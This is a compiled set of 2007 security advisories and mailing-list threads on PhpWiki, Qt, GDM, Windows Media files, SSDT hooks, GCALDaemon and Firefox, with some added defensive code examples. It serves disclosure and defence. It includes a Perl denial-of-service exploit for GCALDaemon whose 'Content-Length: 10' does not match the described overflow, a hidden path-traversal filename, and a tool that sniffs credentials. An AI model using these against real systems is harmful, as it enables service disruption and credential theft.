[ GLSA 200709-10 ] PhpWiki: Authentication bypass
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory GLSA 200709-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                             http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: PhpWiki: Authentication bypass
      Date: September 18, 2007
      Bugs: #181692
        ID: 200709-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in the PhpWiki authentication
mechanism.

Background
==========

PhpWiki is an application that creates a web site where anyone can edit
the pages through HTML forms.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  www-apps/phpwiki           < 1.3.14                      >= 1.3.14

Description
===========

The PhpWiki development team reported an authentication error within the
file lib/WikiUser/LDAP.php when binding to an LDAP server with an empty
password.

Impact
======

A remote attacker could provide an empty password when authenticating.
Depending on the LDAP implementation used, this could bypass the PhpWiki
authentication mechanism and grant the attacker access to the
application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PhpWiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/phpwiki-1.3.14"

References
==========

  [ 1 ] CVE-2007-3193
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3193

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200709-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
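The bind semantics behind this class of bypass, as an added example that is not PhpWiki's or Gentoo's code: RFC 4513 section 5.1.2 defines a simple bind with a DN and an empty password as an unauthenticated bind, which permissively configured servers answer with success, so a login routine that equates "bind succeeded" with "password verified" lets anyone in. The directory entries, DN layout and fake server below are constructed stand-ins for a real LDAP deployment.

```python
# Added example: why an empty password can pass an LDAP-backed login.
# The directory contents are constructed sample data, not real accounts.

# LDAP resultCode values (RFC 4511)
SUCCESS = 0
INVALID_CREDENTIALS = 49
UNWILLING_TO_PERFORM = 53

DIRECTORY = {
    "uid=alice,ou=people,dc=example,dc=org": "correct horse",
    "uid=bob,ou=people,dc=example,dc=org": "battery staple",
}


class FakeLdapServer:
    """Models the three simple-bind cases of RFC 4513 section 5.1.

    allow_unauthenticated=True mirrors servers or configurations that grant
    the unauthenticated bind; the RFC says servers SHOULD refuse it by
    default, which is the server-side variation behind "depending on the
    LDAP implementation used" in the advisory.
    """

    def __init__(self, directory, allow_unauthenticated=True):
        self.directory = directory
        self.allow_unauthenticated = allow_unauthenticated

    def bind(self, dn, password):
        if dn == "" and password == "":
            return SUCCESS                      # 5.1.1 anonymous bind
        if password == "":
            # 5.1.2 unauthenticated bind: a name is supplied but nothing is
            # verified, so success here proves nothing about the caller.
            if self.allow_unauthenticated:
                return SUCCESS
            return UNWILLING_TO_PERFORM
        if self.directory.get(dn) == password:
            return SUCCESS                      # 5.1.3 name/password bind
        return INVALID_CREDENTIALS


def user_dn(username):
    """Build the bind DN for a wiki user (the DN layout is an assumption)."""
    return "uid=%s,ou=people,dc=example,dc=org" % username


def login_naive(server, username, password):
    """Vulnerable pattern: any successful bind is taken as a valid login."""
    return server.bind(user_dn(username), password) == SUCCESS


def login_hardened(server, username, password):
    """Refuse empty credentials before the bind, so only the name/password
    path can succeed; also refuse DN metacharacters in the username so the
    constructed bind DN cannot be rewritten by the caller."""
    if not username or not password:
        return False
    if any(ch in username for ch in ',=+<>#;\\"'):
        return False
    return server.bind(user_dn(username), password) == SUCCESS
```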
[USN-513-1] Qt vulnerability
===========================================================
Ubuntu Security Notice USN-513-1           September 18, 2007
qt-x11-free vulnerability
CVE-2007-4137
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libqt3-mt                       3:3.3.6-1ubuntu6.4

Ubuntu 6.10:
  libqt3-mt                       3:3.3.6-3ubuntu3.3

Ubuntu 7.04:
  libqt3-mt                       3:3.3.8really3.3.7-0ubuntu5.2

After a standard system upgrade you need to restart your session to
effect the necessary changes.

Details follow:

Dirk Mueller discovered that UTF8 strings could be made to cause a small
buffer overflow. A remote attacker could exploit this by sending
specially crafted strings to applications that use the Qt3 library for
UTF8 processing, potentially leading to arbitrary code execution with
user privileges, or a denial of service.

Updated packages for Ubuntu 6.06 LTS:
[ GLSA 200709-11 ] GDM: Local Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory GLSA 200709-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                             http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: GDM: Local Denial of Service
      Date: September 18, 2007
      Bugs: #187919
        ID: 200709-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GDM can be crashed by a local user, preventing it from managing future
displays.

Background
==========

GDM is the GNOME display manager.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  gnome-base/gdm           < 2.18.4                        >= 2.18.4
                                                             *>= 2.16.7

Description
===========

The result of a g_strsplit() call is incorrectly parsed in the files
daemon/gdm.c, daemon/gdmconfig.c, gui/gdmconfig.c and
gui/gdmflexiserver.c, allowing for a null pointer dereference.

Impact
======

A local user could send a crafted message to /tmp/.gdm_socket that would
trigger the null pointer dereference and crash GDM, thus preventing it
from managing future displays.

Workaround
==========

Restrict the write permissions on /tmp/.gdm_socket to trusted users only
after each GDM restart.

Resolution
==========

All GDM users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose "gnome-base/gdm"

References
==========

  [ 1 ] CVE-2007-3381
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3381

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200709-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
A little advisory content correction.
There is a small mistake in the line:

  readme.txt /../../../../../../../../asdf.exe

This filename originally looks like:

  readme.txt <40 spaces here> /../../../../../../../../asdf.exe

What I mean is that only the "readme.txt" part of the path is visible to
the user, and the directory traversal string can be easily hidden in this
way. The forty space characters aren't displayed correctly due to the
fact that they are shortened to one space by the browser.

j00ru
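A check for the padding trick described above, as an added example that is neither the original advisory's nor j00ru's code: it shows how a fixed-width file list and an HTML rendering each hide the traversal, and flags entry names whose real path components disagree with what the user sees. The 20-column display width, the 4-character padding threshold, the /srv/extract destination and the sample names are assumptions.

```python
# Added example (not from the advisory or the correction above): spotting a
# traversal string that display padding hides from the user.
import posixpath
import re

# Constructed sample names; the 40-space gap reproduces the corrected line.
PADDED_NAME = "readme.txt" + " " * 40 + "/../../../../../../../../asdf.exe"
PLAIN_NAME = "docs/readme.txt"

VISIBLE_COLUMNS = 20      # assumption: width of the file list column shown to the user
PADDING_THRESHOLD = 4     # assumption: a whitespace run this long before '/' is suspicious


def as_seen_in_fixed_column(name, width=VISIBLE_COLUMNS):
    """What a fixed-width file list shows: everything past the column is cut off."""
    return name[:width].rstrip()


def as_seen_in_browser(name):
    """What an HTML rendering shows: any run of whitespace collapses to one space."""
    return re.sub(r"\s+", " ", name)


def analyze_entry_name(name):
    """Return a list of findings for an archive or download entry name.

    Works on the raw name, never on a rendered form, so padding cannot hide
    the '..' components from the check.
    """
    findings = []
    unified = name.replace("\\", "/")          # treat both separator styles alike
    parts = unified.split("/")
    if ".." in parts:
        findings.append("contains a '..' path component")
    if unified.startswith("/"):
        findings.append("absolute path")
    m = re.search(r"\s{%d,}" % PADDING_THRESHOLD, unified)
    if m and "/" in unified[m.end():]:
        findings.append("%d whitespace characters precede a path separator"
                        % len(m.group()))
    return findings


def resolves_outside(name, dest="/srv/extract"):
    """True when joining name onto dest escapes dest after normalisation.

    dest is a placeholder extraction directory; the comparison is done on
    the normalised absolute path, which is what the filesystem would use.
    """
    target = posixpath.normpath(posixpath.join(dest, name.replace("\\", "/")))
    return not (target == dest or target.startswith(dest + "/"))
```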
Uninformed Journal Release Announcement: Volume 8
Uninformed is pleased to announce the release of its eighth volume. This
volume includes 6 articles on a variety of topics:

  - Covert Communications: Real-time Steganography with RTP
    Author: I)ruid

  - Engineering in Reverse: PatchGuard Reloaded: A Brief Analysis of
    PatchGuard Version 3
    Author: Skywing

  - Exploitation Technology: Getting out of Jail: Escaping Internet
    Explorer Protected Mode
    Author: Skywing

  - Exploitation Technology: OS X Kernel-mode Exploitation in a Weekend
    Author: David Maynor

  - Rootkits: A Catalog of Local Windows Kernel-mode Backdoor Techniques
    Authors: skape & Skywing

  - Static Analysis: Generalizing Data Flow Information
    Author: skape

This volume of the journal can be found at:

  http://www.uninformed.org/?v=8

About Uninformed:

Uninformed is a non-commercial technical outlet for research in areas
pertaining to security technologies, reverse engineering, and low level
programming. The goal, as the name implies, is to act as a medium for
providing informative information to the uninformed. The research
presented in each edition is simply an example of the evolutionary
thought that affects all academic and professional disciplines.

- The Uninformed Staff
staff [at] uninformed.org
Re: security notice: Backdooring Windows Media Files
yes, of course :) but u are running Windows Media Player 11 which is not
the default one for Windows XP SP2. Moreover, this Media Player edition
is not slipped through any software update either. Therefore, if you are
not a Media Player fan, you will never get this version on a fully
patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am
vulnerable.

On 9/18/07, Memisyazici, Aras <[EMAIL PROTECTED]> wrote:
> Hi pdp!
>
> Great admirer of your work :) I just wanted to inform you that I have
> tested your claim, on a fully patched/updated Win XP SP2 system with an
> admin account logged in, and was warned sufficiently (asked whether I
> wanted to play asx files, then asked if I was sure by Media Player, then
> pop-up was blocked by IE), while the page you tried to produce was
> blocked via IE's pop-up blocker.
>
> You can see/confirm this by viewing these screenshots:
>
> http://preview.tinyurl.com/34xpcz
> (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png)
>
> and
>
> http://preview.tinyurl.com/34jx5v
> (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png)
>
> This was tested on a plain/manila/vanilla version of XP SP2. All I did
> was update/upgrade to latest available from M$ Update.
>
> Sincerely,
> Aras Memisyazici
> IT/Security/Dev. Specialist
>
> Outreach Information Services
> Virginia Tech

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
RE: security notice: Backdooring Windows Media Files
Err... Windows Media Player 11 update DOES come through on M$ Update. Of
course not via the Express mode, but via Custom mode. It is a recommended
update. When someone tells me "they have fully patched their system" I am
assuming that they have applied any and all patches available from M$
without discrimination.

-----Original Message-----
From: pdp (architect) [mailto:[EMAIL PROTECTED]
Sent: Tuesday, September 18, 2007 3:00 PM
To: Memisyazici, Aras
Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED]
Subject: Re: security notice: Backdooring Windows Media Files

yes, of course :) but u are running Windows Media Player 11 which is not
the default one for Windows XP SP2. Moreover, this Media Player edition
is not slipped through any software update either. Therefore, if you are
not a Media Player fan, you will never get this version on a fully
patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am
vulnerable.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
RE: security notice: Backdooring Windows Media Files
Hi pdp!

Great admirer of your work :) I just wanted to inform you that I have
tested your claim, on a fully patched/updated Win XP SP2 system with an
admin account logged in, and was warned sufficiently (asked whether I
wanted to play asx files, then asked if I was sure by Media Player, then
pop-up was blocked by IE), while the page you tried to produce was
blocked via IE's pop-up blocker.

You can see/confirm this by viewing these screenshots:

http://preview.tinyurl.com/34xpcz
(http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png)

and

http://preview.tinyurl.com/34jx5v
(http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png)

This was tested on a plain/manila/vanilla version of XP SP2. All I did
was update/upgrade to latest available from M$ Update.

Sincerely,
Aras Memisyazici
IT/Security/Dev. Specialist

Outreach Information Services
Virginia Tech

-----Original Message-----
From: pdp (architect) [mailto:[EMAIL PROTECTED]
Sent: Tuesday, September 18, 2007 11:58 AM
To: bugtraq@securityfocus.com; [EMAIL PROTECTED]
Subject: security notice: Backdooring Windows Media Files

http://www.gnucitizen.org/blog/backdooring-windows-media-files

It is very easy to put some HTML inside files supported by Windows Media
Player. The interesting thing is that these HTML pages run in a less
restrictive IE environment. I found that a fully patched Windows XP SP2
with IE6 or IE7 and Windows Media Player 9 (default) will open any page
of your choice in IE even if your default browser is Firefox, Opera or
anything else you have in place. It means that even if you are running
Firefox and you think that you are secure, by simply opening a media
file, you expose yourself to all IE vulnerabilities there might be. Plus,
attackers can perform very very interesting phishing attacks. I prepared
a simple POC which spawns a browser window in full screen mode... Think
about how easy it is going to be to fake the windows logout - login
sequence and phish unaware users' credentials

http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02.asx

On the other hand Media Player 11 (Vista by default) is not exposed to
these attacks.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API
Sirs,

The lack of a defense vector doesn't translate magically to a new attack
vector. The absence of common security mitigating controls is referred
to as a vulnerability. Really, all old attack vectors apply. The secure
design model for this type of application should be sandboxed by zone.
The vulnerability is that the code is implicitly trusted, no sandbox is
implemented, and of course it will be difficult to hold evil gadget
creators to task due to the transparent lack of any accountability by
everyone. Fingers are already flying.

The issue is all about an un-sandboxed application where standard best
practice and vast prior experience should have dictated that it be
sandboxed. This is a divestiture away from signed controls and towards
3rd party security programs. So once again we have no sandbox mitigating
controls coupled with a firm lack of accountability per gadget, which
means breached operating systems. Those who have additional security
programs largely make up the difference and those who don't will always
be wondering why and how the vendor let them get pwned.

> (As you say, I think we'll have to agree to disagree on this one. Let's
> wait until the phishers discover it and then revisit the topic :-).

I think bot herders will have a field day collecting new devices with
this.

Ed

-----Original Message-----
From: pgut001 [mailto:[EMAIL PROTECTED]
Sent: Tuesday, September 18, 2007 6:30 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API

"Roger A. Grimes" <[EMAIL PROTECTED]> writes:

> I'm sorry, we'll have to agree to disagree. I don't see the new attack
> vector here. I, the attacker, have to make you download my malicious
> trojan program, which you install on your computer.

It's not so much the attack vector, it's the usability issue. This makes
it just too easy to convince users to download and execute untrusted
content.

> But if you're worried that your users will click past 3 to 5 warning
> messages to install untrusted gadgets (which they will), then completely
> control them using group policy.

On Joe Sixpack's PC in his den?

(As you say, I think we'll have to agree to disagree on this one. Let's
wait until the phishers discover it and then revisit the topic :-).

Peter
WifiZoo v1.1
Hi All!,

So I was looking for something cool to do, didn't find anything, and
wrote WifiZoo because I kind of needed it at the moment :).

WifiZoo is a tool to gather 'wifi' information passively. It is like
dsniff, but dsniff didn't work well (probably my fault) in the scenario I
wanted to use it in (wifi card, monitor mode, listening for everything,
not associated to any AP, hopping channels all the time) and also lacked
some wifi-specific stuff I needed. It is like Ferret, but WifiZoo is
written in Python and not in C, which for me makes it so much easier to
maintain and modify, and WifiZoo also does some stuff Ferret does not do
(and vice versa :)). Of course, kudos to the previous tools because they
are the predecessors of this 'tool', 'group of python scripts' or
whatever you want to call it :).

WifiZoo does the following:

- gathers bssid->ssid information from beacons and probe responses
  *(now the graph contains the ssid of the bssid :), new in v1.1)*
- gathers the list of unique SSIDs found in probe requests (you can keep
  track of all SSIDs machines around you are probing for, and use this
  information in further attacks) *new in v1.1*
- gathers the list and graphs which SSIDs are being probed from what
  sources *new in v1.1*
- gathers bssid->clients information and outputs it in a file that you
  can later use with graphviz to get a graph with "802.11
  bssids->clients". It gathers both src and dst addresses of packets to
  make the list of clients, so sometimes you get weird graphs that are
  fun to analyze :) (basically, because I still need to omit multicast
  dst addresses and things like that). Using the dst address means that
  sometimes you get MAC addresses of wifi devices that are not near you,
  but I think it gives you information about the wifi 'infrastructure',
  again, I think :).
- gathers 'useful' information from unencrypted wifi traffic (a la
  Ferret, dsniff, etc.), like pop3 credentials, smtp traffic, http
  cookies/authinfo, msn messages, ftp credentials, telnet network
  traffic, nbt, etc.
- and I think that's it.

Requirements:

- Linux
- scapy
- wifi card :)

You can get it here, and take a look at some of the graphs it produces
(very basic but functional :)):

http://community.corest.com/~hochoa/wifizoo/index.html

Direct link:

http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.1.tgz

Thanks!,
Hernan
Re: security notice: Backdooring Windows Media Files
> Think about how easy it is going to be to fake the windows logout -
> login sequence and phish unaware users' credentials

and just how do you propose you catch the SAS with your little IE window?
Plague in (security) software drivers & BSDOhook utility
Hello,

We have found a number of vulnerabilities in implementations of SSDT
hooks in many different products.

Vulnerable software:

 * BlackICE PC Protection 3.6.cqn
 * G DATA InternetSecurity 2007
 * Ghost Security Suite beta 1.110 and alpha 1.200
 * Kaspersky Internet Security 7.0.0.125
 * Norton Internet Security 2008 15.0.0.60
 * Online Armor Personal Firewall 2.0.1.215
 * Outpost Firewall Pro 4.0.1025.7828
 * Privatefirewall 5.0.14.2
 * Process Monitor 1.22
 * ProcessGuard 3.410
 * ProSecurity 1.40 Beta 2
 * RegMon 7.04
 * ZoneAlarm Pro 7.0.362.000
 * probably other versions of the above mentioned software
 * possibly many other software products that implement SSDT hooks

Not vulnerable software:

 * Comodo Personal Firewall 2.4.18.184
 * Daemon Tools Lite 4.10 X86
 * Sunbelt Personal Firewall 4.5.916.0

More details and the BSODhook utility that allows everyone to find
similar vulnerabilities easily are available here:

Advisory:
http://www.matousec.com/info/advisories/plague-in-security-software-drivers.php

Article:
http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php

Regards,

--
Matousec - Transparent security
Research
http://www.matousec.com/
security notice: Backdooring Windows Media Files
http://www.gnucitizen.org/blog/backdooring-windows-media-files

It is very easy to put some HTML inside files supported by Windows Media
Player. The interesting thing is that these HTML pages run in a less
restrictive IE environment. I found that a fully patched Windows XP SP2
with IE6 or IE7 and Windows Media Player 9 (default) will open any page
of your choice in IE even if your default browser is Firefox, Opera or
anything else you have in place. It means that even if you are running
Firefox and you think that you are secure, by simply opening a media
file, you expose yourself to all IE vulnerabilities there might be. Plus,
attackers can perform very very interesting phishing attacks. I prepared
a simple POC which spawns a browser window in full screen mode... Think
about how easy it is going to be to fake the windows logout - login
sequence and phish unaware users' credentials

http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02.asx

On the other hand Media Player 11 (Vista by default) is not exposed to
these attacks.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[ MDKSA-2007:185 ] - Updated avahi packages fix vulnerability
 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:185
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : avahi
 Date    : September 17, 2007
 Affected: 2007.0, 2007.1
 _______________________________________________________________________

 Problem Description:

 The Avahi daemon in 0.6.20 and previous allows attackers to cause a
 denial of service via empty TXT data over D-Bus, which triggers an
 assert error.

 Updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3372
 _______________________________________________________________________

 Updated Packages:
GCALDaemon Remote DoS
Secure Network - Security Research Advisory Vuln name: GCALDaemon Remote DoS Systems affected: GCALDaemon 1.0-beta13 (all platforms) Systems not affected: - Severity: Low Local/Remote: Remote Vendor URL: http://gcaldaemon.sourceforge.net/ Author(s): Luca "ikki" Carettoni - [EMAIL PROTECTED] Vendor disclosure: 22nd August 2007 Vendor acknowledged: 22nd August 2007 Vendor patch release: n/a Public disclosure: 18th September 2007 Advisory number: SN-2007-01 Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com *** SUMMARY *** GCALDaemon is an OS-independent Java program that offers two-way synchronization between Google Calendar and various iCalendar compatible calendar applications. GCALDaemon is primarily designed as a calendar synchronizer but it can also be used as a Gmail notifier, Address Book importer, Gmail terminal and RSS feed converter. Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over HTTP, by uploading their file via an HTTP PUT and getting/refreshing their calendar with an HTTP GET. The GCALDaemon's built-in HTTP server keeps this HTTP messages in sync with a specified Google Calendar. An input validation flaw permits to craft an HTTP request with an abnormal content-length value; this malformed request could trigger a denial of service that arises from a Java out of memory fatal error. *** VULNERABILITY DETAILS *** Using a crafted HTTP request, an attacker could trigger a denial of service that arises from a java.lang.OutOfMemoryError when the Java heap space is overfilled. In the file "org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's built-in HTTP server parses the HTTP request and the HTTP header parameters without validation checkpoints. 
At line 490 of "org/gcaldaemon/core/http/HTTPListener.java" the "Content-Length" header value is used to allocate a new byte array; when the requested size is large enough, this triggers a Java fatal error that blocks the HTTP daemon:

Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap space
        at org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
        at org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)

*** EXPLOIT ***

The provided proof-of-concept can trigger the issue.

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') or die "error: $!\n";

print "GCALDaemon DoS Exploit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 10\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";

*** FIX INFORMATION ***

This bug will be fixed in the next version of GCALDaemon. Thanks to the GCALDaemon developers for the great tool.

*** WORKAROUNDS ***

The built-in web server can be configured with a set of allowed hostnames or IP addresses; the default configuration is "allow ALL". Restricting the allowed hosts prevents remote attackers from triggering this flaw.

*** LEGAL NOTICES ***

Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating with software developers for properly handling disclosure issues.

This advisory is copyright © 2007 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given.
It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible.

E-mail: [EMAIL PROTECTED]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404
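The allocation pattern the GCALDaemon advisory above describes at HTTPListener.java:490, shown as an added example beside a bounded reader that validates Content-Length before touching the heap and grows its buffer only with bytes actually received. This is not GCALDaemon's code; the class and method names and the 1 MiB limit are assumptions.

```java
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;

public final class BoundedBodyReader {

    /** Largest body the server will buffer; the value is an assumption for this example. */
    static final int MAX_BODY_BYTES = 1 << 20;

    /**
     * Unsafe pattern: the header alone sizes the allocation. "Content-Length: 2147483647"
     * asks the JVM for ~2 GiB per request and ends in java.lang.OutOfMemoryError,
     * killing the listener thread as in the advisory's stack trace.
     */
    static byte[] readBodyUnsafe(InputStream in, String contentLengthHeader) throws IOException {
        int length = Integer.parseInt(contentLengthHeader.trim());
        byte[] body = new byte[length];          // attacker-controlled size, allocated up front
        new DataInputStream(in).readFully(body);
        return body;
    }

    /**
     * Hardened version: reject malformed, negative or oversized lengths before touching
     * the heap, then read in fixed chunks so memory grows only with bytes received.
     * Pair with a socket read timeout so a client cannot hold the thread open forever.
     */
    static byte[] readBodySafe(InputStream in, String contentLengthHeader) throws IOException {
        long declared;
        try {
            declared = Long.parseLong(contentLengthHeader.trim());
        } catch (NumberFormatException e) {
            throw new IOException("malformed Content-Length: " + contentLengthHeader);
        }
        if (declared < 0 || declared > MAX_BODY_BYTES) {
            throw new IOException("Content-Length " + declared + " outside 0.." + MAX_BODY_BYTES);
        }
        ByteArrayOutputStream body = new ByteArrayOutputStream();
        byte[] chunk = new byte[8192];
        long remaining = declared;
        while (remaining > 0) {
            int n = in.read(chunk, 0, (int) Math.min(chunk.length, remaining));
            if (n < 0) throw new IOException("client closed before sending the declared body");
            body.write(chunk, 0, n);
            remaining -= n;
        }
        return body.toByteArray();
    }
}
```

The limit belongs in configuration alongside the allowed-hosts list the workaround section mentions; a rejected length should close the connection with a 413 rather than leave the socket open.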
[security bulletin] HPSBUX02153 SSRT061181 rev.6 - HP-UX Running Firefox, Remote Unauthorized Access or Elevation of Privileges or Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00771742
Version: 6

HPSBUX02153 SSRT061181 rev.6 - HP-UX Running Firefox, Remote Unauthorized Access or Elevation of Privileges or Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2006-09-20
Last Updated: 2007-09-17

Potential Security Impact: Remote unauthorized access or elevation of privileges or Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Firefox running on HP-UX. These vulnerabilities could be exploited remotely resulting in unauthorized access, elevation of privileges, or Denial of Service (DoS).

References: Mozilla Foundation Security Advisory (MFSA) 2006-20, 2006-22 to 2006-25, 2006-27 to 2006-39, 2006-41 to 2006-48, 2006-50 to 2006-62, 2006-64 to 2006-73, 2006-75, 2006-76, 2007-01 to 2007-09, 2007-11 to 2007-27.

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- ->Firefox prior to v2.0.0.6 running on HP-UX B.11.11 and B.11.23.

BACKGROUND
For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED]
For further information please refer to: http://www.mozilla.org/projects/security/known-vulnerabilities.html

AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
Firefox.FFOX-COM
- ->action: install revision 2.0.0.6 or subsequent
- -> URL: ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.6/contrib/
END AFFECTED VERSIONS

RESOLUTION
- ->Preliminary versions of Firefox v2.0.0.6 are available to resolve the potential vulnerabilities. These preliminary versions have received minimal testing and are localized for English only.
The preliminary versions are available for download from the following URL:
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.6/contrib/

For HP-UX B.11.23 (IA):
- -> ffox_200600alpha_ia.depot
- -> ffox_200600alpha_ia.depot.readme

For HP-UX B.11.11 and B.11.23 (PA):
- -> ffox_200600alpha_pa.depot
- -> ffox_200600alpha_pa.depot.readme

- ->This security bulletin will be revised when fully tested and localized versions of Firefox v2.0.0.6 or subsequent for HP-UX are available.

- ->The most recent fully tested and localized Firefox (v2.0.0.4) is available here: http://www.hp.com/products1/unix/java/firefox/index.html

MANUAL ACTION: Yes - Update
- ->Install Firefox v2.0.0.6

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

HISTORY
Version:1 (rev.1) - 20 September 2006 Initial release
Version:2 (rev.2) - 29 November 2006 preliminary Firefox v1.5.0.8 available
Version:3 (rev.3) - 27 February 2007 preliminary Firefox v1.5.0.9 available
Version:4 (rev.4) - 18 July 2007 preliminary Firefox v2.0.0.4 available
Version:5 (rev.5) - 22 August 2007 fully tested and localized Firefox v2.0.0.4 available
Version:6 (rev.6) - 17 September 2007 preliminary Firefox v2.0.0.6 available

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
To: [EMAIL PROTECTED]
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
